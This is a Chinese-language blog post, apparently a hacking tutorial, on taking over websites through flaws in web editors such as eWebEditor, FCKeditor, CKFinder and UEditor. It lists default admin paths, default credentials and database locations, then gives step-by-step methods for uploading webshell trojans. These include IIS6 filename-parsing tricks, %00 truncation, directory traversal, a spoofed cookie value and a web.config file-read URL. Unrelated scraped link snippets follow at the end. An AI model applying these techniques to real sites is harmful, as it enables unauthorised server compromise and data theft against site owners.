Web入侵之利用编辑器漏洞入侵

Ewebeditor漏洞详细可参考:https://www.0dayhack.com/post-426.html

1、常见的编辑器

常见的有Ewebeditor,fckeditor【目前最强大】,ckeditor,kindeditor等等。

2、ewebeditor编辑器

Ewebeditor是基于浏览器的、所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件(如:Word)所具有的强大可视编辑功能。WEB开发人员可以用她把传统的多行文本输入框替换为可视化的富文本输入框,使最终用户可以可视化的发布HTML格式的网页内容。eWebEditor!已基本成为网站内容管理发布的必备工具!

3.Ewebeditor利用核心

默认后台:www.xxxx.com/ewebeditor/admin_login.asp

默认数据库:ewebeditor/db/ewebeditor.mdb

默认账号密码:admin admin/admin888

注释:改后缀问题,使用专业下载工具。管理员通常会把数据库文件后缀改成asp

4、ewebeditor的利用过程

① 、首先访问默认管理页看是否存在

默认管理页地址2.80以前为 ewebeditor/admin_login.asp 以后版本为admin/login.asp(其他语言改后戳,这里以asp为例)

②、默认管理帐号密码

默认管理页存在!我们就用帐号密码登陆!默认帐号密码为: admin admin888 !常用的密码还有admin admin999 admin1 admin000 之类的。

③、默认数据库地址

默认数据库路径为:ewebeditor/db/ewebeditor.mdb 常用数据库路径为:

ewebeditor/db/ewebeditor.asa

ewebeditor/db/ewebeditor.asp

ewebeditor/db/#ewebeditor.asa

ewebeditor/db/#ewebeditor.mdb

ewebeditor/db/ewebeditor.mdb

ewebeditor/db/!@#ewebeditor.asp

ewebeditor/db/ewebeditor1033.mdb 等等。

④、漏洞基本利用步骤,以asp为例

1)、登陆后台以后。选择样式管理,

默认编辑器的默认样式都不可以修改的。我们可以从任意样式新建一个样式,然后在图片上传添加可上传后缀。

完成之后点击提交

2)、然后在工具栏中新增工具

3)、在按钮设置里新增"插入或修改图片"

然后点击保存设置。然后再回去点击预览。

由于浏览器版本问题需要换到低版本,然后点击预览,选择图片,上传一句话木马

4)、复制链接到浏览器拿下webshell

可以进行相关操作

⑤、漏洞二-目录遍历

在id=14后面加上&dir=…/

⑥、寻找前人痕迹再次入侵

使用下面的语句进入突破:

ewebeditor.asp?ID=xx&style=yy

⑦、文件上传漏洞

版本号:2.1.6

存在sql注入

5、FCKeditor编辑器

①.查看编辑器版本

FCKeditor/_whatsnew.html

②、进入编辑器页面

FCKeditor/_samples/default.html

③、.常用上传地址

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=…/…/connectors/asp/connector.asp

由于这里用的是2.5的版本所以下面这条语句能用

http://192.168.87.129:8234//editor/filemanager/browser/default/browser.html?Type=Image&Connector=…/…/connectors/asp/connector.asp

如果在输入以上地址测试的过程中弹出以下的提示

那就是没有开启文件上传功能,要把\editor\filemanager\connectors\asp\config.asp文件中的

Dim ConfigIsEnabled

ConfigIsEnabled = False

设置成功true。就行了,然后上传6.asp;.jpg文件试试

[木马文件地址](http://192.168.60.92:170/userfiles/image/fendoooo.asp/2_asp;.jpg)

6、CKFinder编辑器

任意文件上传漏洞

其1.4.3 asp.net版本存在任意文件上传漏洞,攻击者可以利用该漏洞上传任意文件,CKFinder在上传文件的时候,强制将文件名(不包括后缀)中点号等其他字符转为下划线_,但是在修改文件名时却没有任何限制,从而导致可以上传1_php;1.jpg等畸形文件名,最终导致文件上传漏洞

然后修改文件名

1_php;1.jpg

利用iis6.0目录解析漏洞拿shell

创建目录/x.asp/

在目录下上传图片马即可拿shell

南方数据编辑器**southidceditor

首先登陆后台

利用编辑器上传

访问admin/southidceditor/admin_style.asp

修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传

7、UEDITOR编辑器

利用ii6.0文件名解析漏洞

上传图片改名为

x.php;20221.jpg获取shell

DotNetTextBox编辑器漏洞

关键字:system_dntb/

确定有system_dntb/uploadimg.aspx并能打开,这时候是不能上传的,由于他是验证cookie来得出上传后的路径,这样我们可以用cookie欺骗工具

cookie:UserType=0;IsEdition=0;Info=1;

uploadFolder=…/system_dntb/Upload/;

路径可以修改,只要权限够,上传后改名为1.asp;.jpg利用iis解析漏洞

PHPWEB网站管理系统后台Kedit编辑器

两种利用方式

第一种是利用iis6.0文件名解析漏洞

xx.php;xx.jpg

第二种方式

%00截断

xx.php%00jpg

Cute Editor 在线编辑器本地包含漏洞

影响版本:

Cute Editor For Net 6.4

脆弱描述

可以随意查看网站文件内容,危害较大

攻击利用

http://www.xx.com/Cute_Client?CuteEditor/Load.ashx?type=image&file=…/…/…/web.config

ueditor 编辑器增加css样式_Web入侵之利用编辑器漏洞入侵相关推荐

  1. ueditor 编辑器增加css样式_ueditor编辑器实现语法高亮

    ueditor编辑器实现语法高亮 本站前期采用的是dreamlu开源博客搭建,网站后台编辑器采用的是百度ueditor富文本编辑器.在我的迭代改进时,在编辑器上还采用了这一编辑器,不过一直以来发现后台 ...

  2. ueditor 编辑器增加css样式_百度编辑器(uedtior)怎么更换样式文件

    我们肯定经常要对编辑器做二次开发,对编辑器主题皮肤的修改就是最简单的修改.下面说下怎么修改. 编辑器初始化里面根本没有在页面里面引入css样式文件. 而只引入了js文件,那是怎么引入的呢? 查看 ue ...

  3. html 点击增加样式,js点击添加css样式 css添加jq点击事件 JavaScript点击增加css样式...

    js可实现点击后对div或者其他标签增加或者删除css样式,从而达到实现点击触发某种效果的目的.页面样式可以通过style修饰,也可以通过css修饰,改变css或者添加css可以改变页面的排版.代码如 ...

  4. Web入侵之利用编辑器漏洞入侵

    Web入侵之利用编辑器漏洞入侵 Ewebeditor漏洞详细可参考:https://www.0dayhack.com/post-426.html 1.常见的编辑器 常见的有Ewebeditor,fck ...

  5. react 改变css样式_web前端入门到实战:编写CSS代码的8个策略,资深开发工程师总结...

    编写基本的CSS和HTML是我们作为Web开发人员学习的首要事情之一.然而,我遇到的很多应用程序显然没有人花时间真正考虑前端开发的长久性和可维护性.我认为这主要是因为许多开发人员对组织CSS / HT ...

  6. 利用samba漏洞入侵linux主机(samba低版本漏洞利用)

    复现samba漏洞入侵linux主机(samba低版本漏洞利用) Samba是在Linux和UNIX系统上实现,由服务器及客户端程序构成.SMB(Server Messages Block,信息服务块 ...

  7. 利用被入侵的路由器迈入内网——抓包,利用路由器漏洞入侵,进行流量劫持...

    from:https://www.anquanke.com/post/id/82638 去年开始利用路由器对目标内网进行渗透的方式方法开始研究,测试了一阵了.看到乌云之前有一篇翻译外国人的文章,讲路由 ...

  8. 挖矿程序 入侵php,利用ThinkPHP漏洞下载并执行挖矿脚本

    利用url如下: /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0] ...

  9. jquery拼接后css样式不生效_JQuery常用选择器以及操作属性和样式的方法介绍

    JQuery日常操作有选择器,获取和操作属性,css样式,文本等等,下面是一些常用的操作,代码以图片形式(哈哈,其实还是我懒,大神别喷我,我还是渣渣),就是一些日常的学习笔记 JQuery中的属性选择 ...

最新文章

  1. 计算机地址永无符号数表示,计算机如何区分 有符号 无符号数的区别???
  2. 错误记录集锦(遇到则记下)
  3. vs2008C1902数据库管理程序不匹配
  4. Java 内置的数据类型
  5. 俞敏洪吹的牛破了?首场直播带货后 新东方股价大跌
  6. java 反射获取属性名和值_面试官这样问我Java反射原理,我刚好都会
  7. 中国水培营养素行业市场供需与战略研究报告
  8. 编译原理龙书第四章部分习题(编译原理作业三)
  9. 微型计算机控制第三版,清华大学出版社-图书详情-《微型计算机控制技术(第3版)》...
  10. 学习笔记(01):2020软考网络工程师--基础知识视频教程-计算机硬件基础(一)
  11. sqlserver transact-sql UPDATE tran 用事务处理更新语句
  12. java校园圈子论坛跳蚤市场小程序源码
  13. 在软件测试面试过程中如何进行自我介绍?
  14. Android:自动点击屏幕
  15. Sliding Window Maximum
  16. 达梦数据库初始化常用参数查询及介绍
  17. uni-app - APP平台禁止页面滑动(无法上下滚动屏幕页面)
  18. 会说话的艾米 拔萝卜
  19. 计算机和音乐结合的作品,用计算机创作多媒体作品──音乐和声音张燕.doc
  20. Java实现excel大数据量导出

热门文章

  1. information_schema.engines学习
  2. duplicate复制数据库
  3. Lc.exe已退出 代码为-1
  4. CGI form标签学习
  5. 如何解决sqlserver 2005 备份的时候无法选择除系统盘外的其他盘符?
  6. 应用HTMLParser解释操作HTML内容
  7. 剑指offer(C++)-JZ27:二叉树的镜像(数据结构-树)
  8. qemuuser模式运行linux,在Android上使用qemu-user运行可执行文件
  9. 怎么设计接口测试用例更好——百度大佬“教你写用例”
  10. 埃斯顿服务器上电无显示,埃斯顿伺服常见现象报警及排除